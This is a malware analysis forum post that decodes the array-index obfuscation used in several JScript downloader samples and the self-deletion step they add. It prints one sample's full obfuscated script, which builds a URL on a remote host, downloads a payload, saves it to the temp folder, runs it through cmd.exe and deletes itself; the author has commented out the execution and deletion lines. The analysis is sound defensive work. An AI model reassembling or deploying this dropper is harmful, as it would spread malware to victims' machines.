Malware Analysis INFO_19595.js,EURO_8636.js,EMAIL_25793.js : improvement of obfuscation method used in POSTNORD_1755

DardiM

May 14, 2016
From https://malwaretips.com/threads/21-11-2016-7.65690/
Thanks to @Daniel Hidalgo

8/54 INFO_19595.js
6/54 EURO_8636.js
6/54 EMAIL_25793.js

Why these samples?
Because they are from the same family I analyzed a few days ago, but the error mentioned and the obfuscation used with the arrays have been improved.

YOU REALLY NEED TO SEE THE PREVIOUS ANALYSIS BEFORE READING THE CURRENT ONE
The link to the previous test:
https://malwaretips.com/threads/postnord_1755-js-error-on-the-path-name-payload-cryptolocker.65623/

These 3 samples use the same URL to download the payload, and the script parts use the same obfuscation methods.
So I will only show the changes from POSTNORD_1755.js, using EMAIL_25793.js as an example.

1) What it looks like:


As usual, I made some modifications to the spoiler part to avoid "copy-paste => save => run => infection" :p
var uwabbyranl = [3, 2, 8, 6, 9, "cmd.", 5, 6, 1, 5]["5"];
var yfezico0 = [8, "9 =", 9, 8, 8, 8, 5, 1]["1"];
var exolcyky = [2, 1, "ete", 4, 1, 7, 1, 5, 3]["2"];
var kzunaxve5 = [6, 5, 7, 7, 6, 7, 8, 5, "eTo"]["8"];
var jzucpekkage = [4, 3, 6, 3, 5, 4, "cia", 2, 6, 3]["6"];
var otvebolhyn = [5, 9, 5, 6, 2, 3, 8, 'on', 4, 2]["7"];
var bvunygze9 = [2, "rn '", 2, 6, 1, 6, 5, 1]["1"];
var yfjobulki = ["jw ", 1, 1, 7, 1, 6, 1, 4, 6, 4]["0"];
var jyryxxirnu = ['e', 2, 6, 2, 5, 9, 6, 4]["0"];
var qdiqxywili4 = [4, 7, 1, 5, "1')", 3, 3, 9, 5, 2]["4"];
var ohmicmoftil = ["scri", 6, 5, 4, 7, 6, 5, 4, 6]["0"];
var ygpagag = [4, 9, 6, 3, 2, "ont", 5, 2]["5"];
var lagyvgeq4 = [6, 3, 5, 1, 5, 2, "lFo", 3]["6"];
var xqasmyvpe = [" 4;", 3, 5, 2, 6, 8, 6, 9, 4]["0"];
var usbijvepij = [6, 3, "ngt", 8, 9, 9, 1, 4, 6, 3]["2"];
var qziherlamwo = [8, 2, 2, 6, 9, 6, 3, 9, "h.t", 4]["8"];
var slyplumxop8 = [1, 6, 8, 4, 3, 6, "bje", 9, 1, 1]["6"];
var iwebog = [5, 4, 3, 5, 7, "yst", 3, 5, 4]["5"];
var gemoto6 = [5, 3, 5, 3, 8, 3, "etu", 8, 9]["6"];
var binsujod1 = [3, 4, "xv9", 8, 7, 5, 8, 5, 3]["2"];
var bzacoge6 = [1, 4, 1, 3, "stem", 6, 7, 5, 5, 7]["4"];
var izretadvi = [3, 5, 2, 1, "ive", 7, 9, 2]["4"];
var cbufzeqkulc5 = [1, 3, 6, 6, 4, "MSXM", 2, 9]["5"];
var tanynu2 = [4, "ct';", 4, 6, 5, 6, 2, 8]["1"];
var iqjiwpalo = [9, 7, 9, 9, 8, 2, 5, "tiv", 6, 2]["7"];
var utyxoju2 = ["g.Fi", 4, 9, 3, 8, 3, 9, 4]["0"];
var otyvzysun = [7, 3, "urn", 4, 2, 3, 1, 4, 8, 7]["2"];
var qusuhyxi = ['Stat', 1, 8, 3, 2, 6, 5, 5]["0"];
var yfomgurudm = [7, 8, 8, "Nam", 5, 5, 6, 1, 2]["3"];
var worityn = [8, 2, "Act", 9, 8, 1, 8, 8, 1, 7]["2"];
var vvecjijki4 = [4, 4, 6, 9, 6, 1, 5, "htt", 8]["7"];
var lgufjaregzi = ['iti', 7, 2, 3, 7, 2, 3, 9, 6, 4]["0"];
var aqympiw = WScript;
var akiwely = [7, "0()", 1, 7, 3, 6, 3, 8]["1"];
var yxytud8 = [2, 9, 7, "p:/", 5, 4, 2, 9]["3"];
var uzanulx = [2, 7, 8, 6, 8, 1, 1, 5, 4, "asu"]["9"];
var uxysizi = [4, 6, 6, 2, 6, 8, 9, "/ww", 7]["7"];
var fumweledzu6 = ["ipt.", 5, 2, 8, 2, 6, 6, 5]["0"];
var wexuflu = [1, 3, 8, 2, 'me', 9, 1, 2, 5]["4"];
var rajkezhefli = [8, 3, 6, 4, 7, "ptin", 1, 2, 4]["5"];
var ugipit5 = [5, "op/", 7, 7, 5, 3, 7, 3]["1"];
var ruxrabu = [7, 'me', 9, 6, 7, 5, 7, 8]["1"];
var qcevesrozci = [4, 6, 9, "h >", 6, 5, 9, 5, 5]["3"];
var yptypmewo4 = [8, 7, 9, 6, 1, 7, 2, "ily"]["7"];
var yfhopiqluhh2 = [7, 8, 5, 7, 1, 4, "ath", 4, 4]["6"];
var ukekkiva = [8, "/c ", 7, 6, 6, 7, 9, 9, 8]["1"];
var zevibnib = [1, "seB", 1, 4, 2, 2, 2, 5, 7, 8]["1"];
var jajyhyxwy = [7, 6, 5, 8, 2, 8, 8, 3, 6, 'Ful']["9"];
var yjybxywif5 = [8, 9, 2, "teP", 8, 7, 4, 7, 5]["3"];
var wmunafy = [7, 3, 7, 6, 2, "eam", 8, 9]["5"];
var gamcedeku0 = ["jw.", 8, 8, 1, 1, 5, 8, 7]["0"];
var mazqakyjzo = [3, 5, 5, "ADO", 5, 5, 5, 5]["3"];
var osabaq = [9, 6, 2, 'Typ', 1, 1, 1, 2]["3"];
var nygqyczoz = [2, 3, 4, 7, "MLHT", 9, 8, 6, 6]["4"];
var bidnovvyqp6 = ["apl", 4, 3, 5, 9, 7, 4, 1, 3]["0"];
var awgykpomoj1 = ["Clos", 3, 9, 3, 9, 2, 8, 9, 7, 2]["0"];
var tfufubres0 = [3, 5, 8, 5, 7, 'Tem', 8, 5]["5"];
var keluqy4 = [3, 2, 2, 9, 1, 9, "bje", 7]["6"];
var lgimonra3 = [1, "Pos", 1, 9, 2, 4, 1, 4]["1"];
var pdimuly = [6, 1, "send", 5, 4, 7, 8, 4]["2"];
var zbydiqsoli4 = [6, "at", 5, 5, 2, 2, 1, 9, 1, 8]["1"];
var brisewet = [6, 5, 9, 7, 9, "L2.X", 1, 4, 9, 4]["5"];
var fjynhevonra1 = [2, 'Sav', 9, 2, 9, 3, 2, 8, 1, 5]["1"];
var molycohj0 = ["e('", 6, 1, 5, 2, 5, 3, 9, 3, 7]["0"];
var ashesubw5 = [5, 5, 4, 8, 2, 5, 1, 5, "akp", 2]["8"];
var mypzynkug = ["?f=", 1, 9, 8, 8, 7, 4, 3]["0"];
var hnegfepsuta3 = [2, 7, 3, 4, 1, 3, 5, 6, "te", 9]["8"];
var brigigo4 = [6, "Obje", 5, 5, 2, 5, 9, 3]["1"];
var iveruky = [3, 3, "Abs", 6, 6, 7, 2, 2, 4, 9]["2"];
var hdocirzy1 = [5, 6, "e", 2, 5, 9, 2, 7, 9]["2"];
var kjunyhimo = [8, 9, 4, 7, 1, "Get", 5, 6, 8]["5"];
var tonumejt = [3, 6, 5, "ipt", 3, 1, 7, 1]["3"];
var tigviqzave7 = [9, "ing", 8, 5, 4, 1, 1, 8]["1"];
var ysgupuphuwh = [3, 9, "wug", 2, 7, 4, 8, 3, 2, 6]["2"];
var umunozemw = [1, 5, 2, 4, 6, 9, 8, 8, "retu"]["8"];
var djyvoroc = [7, 6, 8, 5, 9, 9, 2, "l", 1, 7]["7"];
var ytydqesxer0 = [9, 1, 8, 3, 6, 4, 3, 2, "ew ", 9]["8"];
var exaqkyvtir = [4, "t(m", 7, 5, 6, 5, 5, 6]["1"];
var uvmewasca = [9, 7, 1, 9, 8, 8, 3, 2, 4, 'r']["9"];
var izucuwg3 = [6, 2, 4, ".le", 7, 3, 9, 1, 5]["3"];
var ucyvyxquqk = [9, 9, 7, 9, 8, 3, "jec", 2]["6"];
var ynabovx4 = [6, "us", 5, 3, 6, 8, 4, 7, 8]["1"];
var omxemhylf2 = [4, 5, 3, 4, 6, " jr", 4, 2, 6]["5"];
var ysvafvef4 = [2, 6, 6, 8, 6, "ret", 4, 1]["5"];
var evqubecipn7 = [1, 7, 9, 3, 4, 9, 1, "); ", 6, 6]["7"];
var bifwotpu = ["; r", 9, 1, 5, 4, 7, 9, 7, 5]["0"];
var jenhadno1 = ['ody', 2, 1, 8, 4, 1, 9, 7]["0"];
var rtyrcomozsa8 = [8, 5, 4, 9, 'Get', 5, 4, 1]["4"];
var yksazbasfo8 = [6, 'Res', 6, 9, 8, 1, 9, 1, 5]["1"];
var ywdoczycg = [3, 5, "Str", 3, 6, 1, 5, 7]["2"];
var nuvykkorbu = [7, "Shel", 1, 7, 8, 2, 2, 1, 9]["1"];
var onbitbij = ["WScr", 8, 7, 4, 7, 3, 8, 2, 5, 8]["0"];
var ybyjecehm = [2, "DB.", 6, 2, 6, 8, 6, 8]["1"];
var vwafgehni0 = [1, 9, 6, "run", 6, 6, 8, 1, 6]["3"];
var igoptujmyk = [3, 2, 1, 5, 2, 5, 6, 'Fil', 8]["7"];
var uqdostufy1 = [5, 5, "= n", 9, 6, 5, 1, 3]["2"];
var bbegvobexjy6 = [1, 2, 1, 3, 5, 8, 2, 4, "TP"]["8"];
var porosy6 = [9, 3, "asu", 5, 8, 1, 9, 3]["2"];
var hgudipcu = [2, 4, 2, 2, 1, 4, 6, "n", 1, 3]["7"];
var ojhenyteht = ["rn ", 3, 5, 6, 1, 9, 9, 5, 2, 7]["0"];
var odojkycxyzd = [4, 1, 4, 4, 7, 2, 8, 'open', 4, 1]["7"];
var ofeqyxhuwt = [4, 9, "eXO", 1, 3, 7, 1, 3]["2"];
var kpiheko = [3, 8, 5, 5, 6, 6, 5, 6, "ugv", 5]["8"];
var deqxihaky = [2, 9, 7, 5, 2, 9, "olu", 1]["6"];
var kyvgicis3 = [1, 3, 1, 3, 7, 4, 1, 8, "var", 1]["8"];
var obutdymi = [4, 'Fil', 4, 4, 8, 7, 4, 5, 2]["1"];
var tkymrawcy = [2, 5, 3, 9, 1, 'ipt', 8, 3, 6, 7]["5"];
var fhadisuhy = [6, 6, 3, 1, 8, 4, "leS", 2, 1, 6]["6"];
var rzedsygwu = [3, 3, 6, 7, 7, "w.c", 5, 1]["5"];
var anhujyv1 = [3, 5, 9, 8, "\\\\", 9, 4, 7]["4"];
var udbuxdakhavq = [1, 2, 8, 6, "adm", 9, 5, 1]["4"];
var fdukezyh8 = [6, 5, 3, 5, 9, 9, 6, 2, "Scr", 7]["8"];
var texlopkak1 = [2, 7, 5, 3, "Scr", 8, 6, 8, 6, 6]["4"];
var episyvt7 = [7, 6, 5, 8, 5, 1, 6, 7, "php", 9]["8"];
var ewnehaca = [8, 9, 9, " Ac", 3, 9, 2, 1]["3"];
var emytipq = [7, 4, 5, 9, 1, 5, 3, "ct;", 3, 3]["7"];
var soxispi = [1, ".Fi", 2, 2, 3, 1, 5, 9]["1"];
var ihdufdutynd6 = [9, 8, 5, 3, 4, 6, 3, 2, 6, "XOb"]["9"];
var uflesepf = [3, "riv", 2, 4, 4, 2, 6, 6, 8, 9]["1"];
var zudxoba8 = [2, 7, 'e', 3, 3, 4, 4, 7, 3, 1]["2"];
var bacodta2 = [4, 7, "emO", 8, 5, 8, 4, 1, 4]["2"];
var afehjate1 = [9, 5, 'lNa', 1, 9, 3, 7, 5, 2, 8]["2"];
var exacdubx = [3, 8, 9, 8, 7, 5, "in.", 8, 3]["6"];
var oxefzetfez2 = [1, 2, "vil", 5, 9, 4, 2, 4, 3, 5]["2"];
var ipexetl = [5, 8, " jr", 6, 2, 2, 4, 1, 2]["2"];
var hhitwycyxd0 = [4, 4, 5, 1, 6, 'lde', 1, 2]["5"];
var umqesas0 = [1, 4, 9, "exe ", 5, 2, 5, 8, 4]["3"];
var snumsisike = [8, 1, 4, 3, 3, 9, 1, 'Wri', 6, 7]["7"];
var bigpefco = [1, 7, 8, 4, "e", 2, 6, 7, 3, 7]["4"];
var quludvi1 = ["Spe", 8, 3, 7, 9, 1, 9, 5]["0"];
var aptimota = [8, "var", 9, 6, 6, 7, 4, 7, 4]["1"];
var mixemrid4 = [9, 5, "ct", 2, 6, 5, 7, 5, 8, 9]["2"];
var odrifmigh = [8, "lesy", 1, 5, 7, 3, 8, 8, 7]["1"];
var odomebef = [4, 6, 7, 8, 7, 3, "pon", 5]["6"];
var zcexsaqekg = [2, "Get", 1, 9, 3, 9, 8, 1]["1"];
var ulhabvaze2 = [8, 5, 6, 9, 7, 7, "edz", 4]["6"];
var etjufymurb = [3, 7, 8, 3, 9, 4, "yxv", 2, 4, 5]["6"];
var mopepo = ["GET", 7, 6, 2, 9, 7, 6, 5, 5]["0"];
var xdimrugva0 = [2, 8, 8, 2, 2, 3, 8, "ovw"]["7"];
var ahnensuhuv = [6, 6, 8, 9, "2.d", 7, 8, 8]["4"];
var gibdymco0 = [4, "pNa", 3, 9, 4, 5, 6, 6]["1"];
var ipjatzypko = [4, "zyd", 6, 6, 1, 8, 8, 5]["1"];
var cimwenxi = [9, " ov", 5, 4, 6, 5, 7, 8, 4, 6]["1"];
var urtiwguqja = [4, 1, 'Ope', 9, 8, 6, 7, 9, 3]["2"];
var ifcedyka9 = [4, 6, 2, 7, 7, 2, "del", 3, 3]["6"];
var irvyrzisi1 = [4, 7, 2, umunozemw + bvunygze9 + ohmicmoftil + rajkezhefli + utyxoju2 + odrifmigh + bzacoge6 + brigigo4 + tanynu2, 6, 9, 4, 9]["3"];
var dijditonz6 = [2, 4, 3, 3, 6, 7, kyvgicis3 + ipexetl + porosy6 + yfjobulki + uqdostufy1 + ytydqesxer0 + worityn + izretadvi + ihdufdutynd6 + ucyvyxquqk + exaqkyvtir + ipjatzypko + ashesubw5 + bidnovvyqp6 + akiwely + evqubecipn7 + aptimota + cimwenxi + ysgupuphuwh + oxefzetfez2 + etjufymurb + yfezico0 + omxemhylf2 + uzanulx + gamcedeku0 + kjunyhimo + iveruky + deqxihaky + yjybxywif5 + yfhopiqluhh2 + yfomgurudm + molycohj0 + qdiqxywili4 + bifwotpu + gemoto6 + ojhenyteht + xdimrugva0 + kpiheko + yptypmewo4 + binsujod1 + izucuwg3 + usbijvepij + qcevesrozci + xqasmyvpe, 5]["6"];
var ileslyxy5 = [1, 3, 9, ysvafvef4 + otyvzysun + ewnehaca + iqjiwpalo + ofeqyxhuwt + keluqy4 + emytipq, 1, 1, 7, 4, 5, 6]["3"];
var yvyndax = [6, 2, 4, 6, 3, 6, 5, 4, mazqakyjzo + ybyjecehm + ywdoczycg + wmunafy, 3]["8"];
var ijigsokhimw3 = [5, 5, 2, 9, 6, vvecjijki4 + yxytud8 + uxysizi + rzedsygwu + ygpagag + uflesepf + ulhabvaze2 + qziherlamwo + ugipit5 + udbuxdakhavq + exacdubx + episyvt7 + mypzynkug + ahnensuhuv + zbydiqsoli4, 3, 1, 5, 4]["5"];
var derfycgy = [5, 2, 8, 6, 2, 6, onbitbij + fumweledzu6 + nuvykkorbu + djyvoroc, 3, 7, 4]["6"];
var axduxynat = [cbufzeqkulc5 + brisewet + nygqyczoz + bbegvobexjy6, 1, 1, 6, 7, 9, 6, 8]["0"];
var epcemescip = [9, 3, 7, 9, texlopkak1 + tonumejt + tigviqzave7 + soxispi + fhadisuhy + iwebog + bacodta2 + slyplumxop8 + mixemrid4, 7, 8, 5, 2]["4"];
var zgafgado = [6, 8, 6, 7, 7, 8, 7, anhujyv1, 2]["7"];
var yzozyvy = [4, 4, 7, 6, mopepo, 9, 2, 1, 1, 9]["4"];
var odynfinteds = [8, 8, 2, 7, 5, 7, 3, uwabbyranl + umqesas0 + ukekkiva]["7"];
var imis9 = aqympiw;
var mzydakpapl0 = new Function(irvyrzisi1);
var mujegbe = [2, 7, 1, 8, ["rka", 1, 3, 6, 5, 5, 7, 7, 9], 1, 2, 3, 2, 2]["4"];
var cafyjep8 = [8, [6, 6, 3, 1, 3, 6, 4, 6, "cmi", 6], 5, 6, 8, 4, 2, 4]["1"];
var zfukqilvalho7 = [6, 9, 9, 3, 4, 9, 2, 9, 3, [2, 9, 7, 5, 1, 8, 5, 3, "up"]]["9"];
var yxivuvwus = [5, 9, 8, 1, 5, 3, 3, [4, 2, 9, 3, "vpa", 6, 7, 4, 5], 4]["7"];
var ebqypsuzyn = [5, 2, 9, 2, 5, [4, 3, 2, 3, 7, "zi", 6, 2, 5], 2, 3, 8, 9]["5"];
var yqlypnuksud = [8, 4, [8, 7, 1, 7, "gy", 3, 6, 4, 9, 6], 2, 5, 5, 8, 8, 1, 3]["2"];
var dcigacwa4 = [1, 5, 5, 7, 1, 9, 7, [1, 6, 1, "tto", 6, 2, 8, 5, 5], 7, 9]["7"];
var ubmycoble0 = [[2, "zh", 1, 3, 2, 5, 7, 4, 5], 7, 8, 3, 2, 9, 4, 2, 2, 6]["0"];
var ujtodunyf5 = [6, 7, [3, 5, 5, "co", 8, 4, 9, 8, 1], 8, 1, 1, 4, 5]["2"];
var japumu0 = [8, 6, [4, 7, 4, 7, 5, "ry", 9, 8, 6, 7], 7, 5, 5, 6, 1, 9, 3]["2"];
var zuvlezyxe8 = [[4, "lm", 6, 7, 6, 8, 9, 9, 5], 2, 1, 5, 3, 4, 1, 1, 1]["0"];
var ebecuntu5 = [5, 2, 3, 3, 5, 4, 2, ["lqy", 8, 2, 7, 6, 6, 1, 9, 6], 6, 1]["7"];
var mrovwegigca = [9, 3, 8, 3, 5, 1, [2, 2, "avb", 4, 5, 5, 4, 2], 6]["6"];
var zytxyfloldu = [7, 8, 2, 2, 6, 2, [4, "aq", 4, 8, 9, 3, 7, 8, 5, 9], 5, 4]["6"];
var qygsuwwo = [1, 1, [8, 2, "ex", 9, 6, 1, 8, 3], 4, 3, 1, 3, 5]["2"];
var ujdyqkoz = new Function(dijditonz6)();
var asborqyqkyrm0 = [3, [7, 1, 1, 1, 3, 9, "o", 2], 7, 9, 3, 8, 9, 5, 8, 1]["1"];
var gykehogcu3 = [5, 8, 9, 4, [4, 1, 5, 1, 6, 4, 7, "k", 3], 2, 9, 8, 3]["4"];
var daxzaxyme4 = [2, [1, 8, 8, 4, "abt", 1, 9, 7, 6, 8], 2, 7, 2, 1, 5, 6, 1]["1"];
var hcimuqxixw4 = [7, 8, [5, "u", 9, 5, 6, 9, 3, 6], 7, 9, 3, 6, 5]["2"];
var hujcesej = [9, 4, [4, 2, 7, "mna", 8, 6, 5, 5], 7, 4, 4, 9, 8, 7]["2"];
var epowpabnohp4 = [5, 8, 3, ["sc", 4, 8, 2, 7, 5, 6, 1], 9, 7, 5, 6, 2, 1]["3"];
var ymseppybi4 = [[6, 9, "va", 3, 3, 1, 8, 3], 2, 2, 9, 2, 3, 3, 8]["0"];
var gpasgufxeti0 = [4, 1, 4, 2, 5, 1, [8, 7, "g", 4, 7, 7, 8, 4, 9], 8, 3, 5]["6"];
var utduhaciwp3 = [1, 2, [8, 4, 7, 1, 2, 6, 3, 1, 7, "it"], 2, 4, 8, 3, 5]["2"];
var mjowyfzuk = [8, 9, 2, 5, 2, [4, "o", 4, 9, 1, 2, 1, 7], 3, 8, 5]["5"];
var vekxiby = [8, 9, 6, [5, 7, 2, 8, 4, "kq", 5, 7], 7, 6, 1, 4, 6]["3"];
var omalobre7 = [1, [5, 1, 5, 4, "xu", 3, 4, 7, 9, 7], 4, 9, 8, 8, 4, 9, 4]["1"];
var azocxisw = [[4, 8, 9, 8, "ufk", 8, 2, 3], 6, 2, 7, 2, 3, 2, 3, 9, 5]["0"];
var yxycqati = [5, 2, [5, 9, 9, 6, 4, 9, "z", 2, 8, 1], 7, 5, 1, 4, 9]["2"];
var guzcapebh = [3, 6, 5, 7, 8, 2, 9, [7, 3, "o", 4, 8, 6, 4, 7, 8]]["7"];
switch (ujdyqkoz) {
case true:
var hvaqxena = new Function(ileslyxy5)();
var ulosucith = [5, 1, 3, 1, 8, [4, 9, 3, 1, 3, 5, "o", 7, 1], 6, 9]["5"];
var mkolheni2 = [3, 9, [9, 3, 6, "n", 6, 7, 9, 3, 2], 6, 8, 4, 9, 8]["2"];
var emnylpupp4 = [[8, 9, "jnu", 1, 3, 3, 5, 1, 7], 7, 6, 8, 2, 8, 7, 2]["0"];
var geqjyxytp7 = [2, 1, 7, 4, 2, [4, "id", 4, 5, 1, 8, 1, 1], 2, 7, 7]["5"];
var abuqxyhe5 = [7, 7, 7, 1, 1, 9, 1, [7, 5, 3, 6, 2, 6, 6, "jj"]]["7"];
var evgoxhogqo7 = [3, 7, 8, 4, 1, 1, 5, 6, 5, [1, 3, 3, 2, 6, 4, 9, 5, "ep", 9]]["9"];
var jegewyxde = [7, 7, 9, 1, [7, 6, 3, 6, 8, "i", 9, 2, 7], 4, 7, 6, 7]["4"];
var himbatad = [8, 1, 4, 4, 5, 6, 2, 6, 5, [7, "o", 2, 8, 2, 5, 2, 3, 6]]["9"];
var omulpybl5 = [[2, 2, 3, 5, 5, 8, "u", 1, 9], 1, 6, 1, 8, 2, 8, 9]["0"];
var sqyvalapy0 = [[5, 8, 7, 6, 9, 4, 7, 4, 1, "i"], 4, 8, 9, 9, 6, 7, 6, 6, 1]["0"];
var ohucrilc3 = [3, 6, 4, [6, 5, 4, 6, 8, 3, 6, "z", 1, 7], 1, 4, 9, 6, 8]["3"];
var ytelrurm8 = [9, 4, 4, 7, 3, 1, 8, [6, 1, 5, 7, 4, 2, 3, 5, "am", 8]]["7"];
var eziwyqfox3 = [3, 4, 6, 1, 2, 7, 7, 5, [7, 8, 1, 6, 3, 8, 8, "xa", 9, 4], 6]["8"];
var tapkemifwo7 = [8, 6, 6, [5, 2, "yh", 8, 7, 1, 7, 3], 2, 1, 8, 1]["3"];
var rhawuxpullu = [5, 6, 3, 5, 2, 3, 7, 8, 4, [4, 9, 5, 9, 3, 7, "bno", 2, 8, 2]]["9"];
break;
}
var owdeqg2 = yvyndax;
var ekwidedul = new hvaqxena(owdeqg2);
ekwidedul[urtiwguqja + hgudipcu]();
var qupqykmy = ijigsokhimw3;
ekwidedul[lgimonra3 + lgufjaregzi + otvebolhyn] = 0;
var gmavabava8 = derfycgy;
var ecystogo = imis9[fdukezyh8 + tkymrawcy + jajyhyxwy + afehjate1 + wexuflu];
var exet3 = new hvaqxena(gmavabava8);
var qrujcydvipd9 = axduxynat;
var gvidummulj7 = epcemescip;
var jrasujw = new hvaqxena(gvidummulj7);
var abogikn = new hvaqxena(qrujcydvipd9);
var czeqip = jrasujw[rtyrcomozsa8 + quludvi1 + jzucpekkage + lagyvgeq4 + hhitwycyxd0 + uvmewasca](2) + zgafgado + jrasujw[zcexsaqekg + tfufubres0 + gibdymco0 + ruxrabu]();
abogikn[odojkycxyzd](yzozyvy, qupqykmy, 0);
abogikn[pdimuly]();
ekwidedul[osabaq + zudxoba8] = 1;
if (abogikn[qusuhyxi + ynabovx4] == 200) {
ekwidedul[snumsisike + hnegfepsuta3](abogikn[yksazbasfo8 + odomebef + zevibnib + jenhadno1]);
ekwidedul[fjynhevonra1 + kzunaxve5 + obutdymi + jyryxxirnu](czeqip);
ekwidedul[awgykpomoj1 + hdocirzy1]();
var yhamgyv1 = odynfinteds + czeqip;
//exet3[vwafgehni0](yhamgyv1, 0);
}
//jrasujw[ifcedyka9 + exolcyky + igoptujmyk + bigpefco](ecystogo);

2) Main differences from the previously analyzed POSTNORD_1755.js:

2-1) The array parts:

Before:


The strings really used were obfuscated, divided among several vars with strange names, each part hidden in an array + function call:

var ifpagn3 = [707, 3703, 402, 4283, 8168, 3068, 8768, 3403, 3035, 7441, 4400, 3460, 2550, 5548, 3583, 6534, 3040, 8367, "ri"].wuqjy();

var uhadvo8 = [6476, 796, 2367, 4143, 6423, 5940, 3165, 9323, 4834, 4697, 5617, 1273, 9839, 1412, "WS"].wuqjy();

var uxodhy7 = [6532, 1901, 2855, 1852, 7316, 5498, 8452, 4555, 7386, 1261, 7237, 4312, 6763, 8496, "jf"].wuqjy();

var xpyqegxovog4 = [299, 8746, 397, 9032, 4189, 8297, 2463, 2690, 8177, 1406, 1770, 3001, 3468, 7901, 5140, 7728, 4614, "La"].wuqjy();

var amtumyj7 = [2042, 3018, 6405, 578, 3972, 6187, 9686, 3305, 233, 3598, 181, 2311, 6179, 2605, 8505, "Bo"].wuqjy();

We saw in the previous analysis that .wuqjy() was a function used to hide the real JavaScript function used: .pop()
=> to retrieve the last value of the array
For example:

var ifpagn3 = [707, 3703, 402, 4283, 8168, 3068, 8768, 3403, 3035, 7441, 4400, 3460, 2550, 5548, 3583, 6534, 3040, 8367, "ri"].wuqjy();
that is in reality:

var ifpagn3 = "ri"
Using this method, long strings used in the main part of the script are replaced by a concatenation of several strange variable names, whose contents are the pieces of understandable strings.
An example in the main part (after several functions and vars have been built with the above method):

enxocqojolv5 + izavoned3 + mkaqaxykco0 => !?!?
A search (with notepad++, for example) gives:

var enxocqojolv5 = [4764, 8988, 2383, 8868, 8354, 3116, 8929, 9605, 846, 7291, 7109, 1151, "Wr"].wuqjy();

var izavoned3 = [7684, 5677, 403, 6613, 5283, 1150, 3905, 2392, 2201, 1746, 9014, 6705, 3619, 5479, 1781, 2880, 1417, 8530,"it"].wuqjy();

var mkaqaxykco0 = [1638, 8609, 6242, 3285, 7624, 2948, 6805, 3103, 4630, 9585, 4421, 3160, 3408, 1782, 7007, 7779, "e"].wuqjy();

=> enxocqojolv5 + izavoned3 + mkaqaxykco0 = "Write"

With this method, it is very easy to find the "pieces of strings" because it is always the last value of the array that is useful.

The previous sample in detail: https://malwaretips.com/threads/postnord_1755-js-error-on-the-path-name-payload-cryptolocker.65623/

In the new samples:

They have tried to improve this part with other sorts of arrays and retrieving methods.

3 sorts of arrays are used:

I will show 3 examples from the many arrays used:

var uwabbyranl = [3, 2, 8, 6, 9, "cmd.", 5, 6, 1, 5]["5"];
var ebqypsuzyn = [5, 2, 9, 2, 5, [4, 3, 2, 3, 7, "zi", 6, 2, 5], 2, 3, 8, 9]["5"];
var odynfinteds = [8, 8, 2, 7, 5, 7, 3, uwabbyranl + umqesas0 + ukekkiva]["7"];

How does it work to retrieve the "pieces of words"?

(1) var uwabbyranl = [3, 2, 8, 6, 9, "cmd.", 5, 6, 1, 5]["5"];
=> I have put in red the index to be used to get the right value (remember the first value is at index 0, the second at index 1, etc.)

=> var uwabbyranl = "cmd.";

It is the first part of the "cmd.exe ...."

(2) var ebqypsuzyn = [5, 2, 9, 2, 5, [4, 3, 2, 3, 7, "zi", 6, 2, 5], 2, 3, 8, 9]["5"];

=> useless arrays, only in the script to obfuscate a bit more.

How can I know it?
- because a search on the var name (here: ebqypsuzyn) gives only one result: this part => not used elsewhere
- the value at the given index is always another array:
here: [4, 3, 2, 3, 7, "zi", 6, 2, 5]

(3) var odynfinteds = [8, 8, 2, 7, 5, 7, 3, uwabbyranl + umqesas0 + ukekkiva]["7"];

=> the value retrieved is the result of a concatenation (addition, for strings):

=> index 7 (remember, indexes begin at position 0)
=> value at position 7 is the concatenation of uwabbyranl + umqesas0 + ukekkiva
var uwabbyranl = [3, 2, 8, 6, 9, "cmd.", 5, 6, 1, 5]["5"];

=> "cmd."
var umqesas0 = [1, 4, 9, "exe ", 5, 2, 5, 8, 4]["3"];

=> "exe "
var ukekkiva = [8, "/c ", 7, 6, 6, 7, 9, 9, 8]["1"];

=> "/c "
=> var odynfinteds = "cmd.exe /c "

=> the first part of the run command line (we will see later where this part is)

Conclusion: Only two types of obfuscation with arrays are used to really obfuscate data used for the main part. The third type is there to obfuscate the script a bit more, not real important data.
Now, the useful value is not the last value, but needs the index clue to be found.
2-2) The script file:

In the previous sample, there was a part getting the script full path, but it was not used.

Now, at the end of the script, the current script is deleted.

The part that gets the current script path name:

- var ecystogo = imis9[fdukezyh8 + tkymrawcy + jajyhyxwy + afehjate1 + wexuflu];

=> fdukezyh8 + tkymrawcy + jajyhyxwy + afehjate1 + wexuflu = "Scr" + "ipt" + "Ful" + "lNa" + "me"
var imis9 = aqympiw;

var aqympiw = WScript;
=> var ecystogo = WScript.ScriptFullName

Example: "J:\\ANALISE\\21_11_2016\\EMAIL_25793.js"
The part that deletes the script:

- jrasujw[ifcedyka9 + exolcyky + igoptujmyk + bigpefco](ecystogo);

Each part:

=> Retrieved by searching for the "strange name" with the search tool of notepad++

- var jrasujw = new hvaqxena(gvidummulj7);
=> var gvidummulj7 = epcemescip;
=> var epcemescip = [9, 3, 7, 9, texlopkak1 + tonumejt + tigviqzave7 + soxispi + fhadisuhy + iwebog + bacodta2 + slyplumxop8 + mixemrid4, 7, 8, 5, 2]["4"];

=> texlopkak1 + tonumejt + tigviqzave7 + soxispi + fhadisuhy + iwebog + bacodta2 + slyplumxop8 + mixemrid4
=> "Scripting.FileSystemObject"
=> hvaqxena:

=> var hvaqxena = new Function(ileslyxy5)();

=> var ileslyxy5 = [1, 3, 9, ysvafvef4 + otyvzysun + ewnehaca + iqjiwpalo + ofeqyxhuwt + keluqy4 + emytipq, 1, 1, 7, 4, 5, 6]["3"];

=> ysvafvef4 + otyvzysun + ewnehaca + iqjiwpalo + ofeqyxhuwt + keluqy4 + emytipq
=> "return ActiveXObject;"
then: jrasujw: new ActiveXObject("Scripting.FileSystemObject");

=> object to manipulate files/folders
- ifcedyka9 + exolcyky + igoptujmyk + bigpefco

var ifcedyka9 = [4, 6, 2, 7, 7, 2, "del", 3, 3]["6"];

=> "del"
var exolcyky = [2, 1, "ete", 4, 1, 7, 1, 5, 3]["2"];

=> "ete"
var igoptujmyk = [3, 2, 1, 5, 2, 5, 6, 'Fil', 8]["7"];

=> 'Fil'
var bigpefco = [1, 7, 8, 4, "e", 2, 6, 7, 3, 7]["4"];

=> "e"
=> "deleteFile"
- ecystogo: we have seen at the beginning of this part that it is the full script path name

=> WScript.ScriptFullName
then: jrasujw[ifcedyka9 + exolcyky + igoptujmyk + bigpefco](ecystogo);
=> FileObjectSystem["deleteFile"](WScript.ScriptFullName)

Example:

FileObjectSystem.deleteFile("J:\\ANALISE\\21_11_2016\\EMAIL_25793.js")
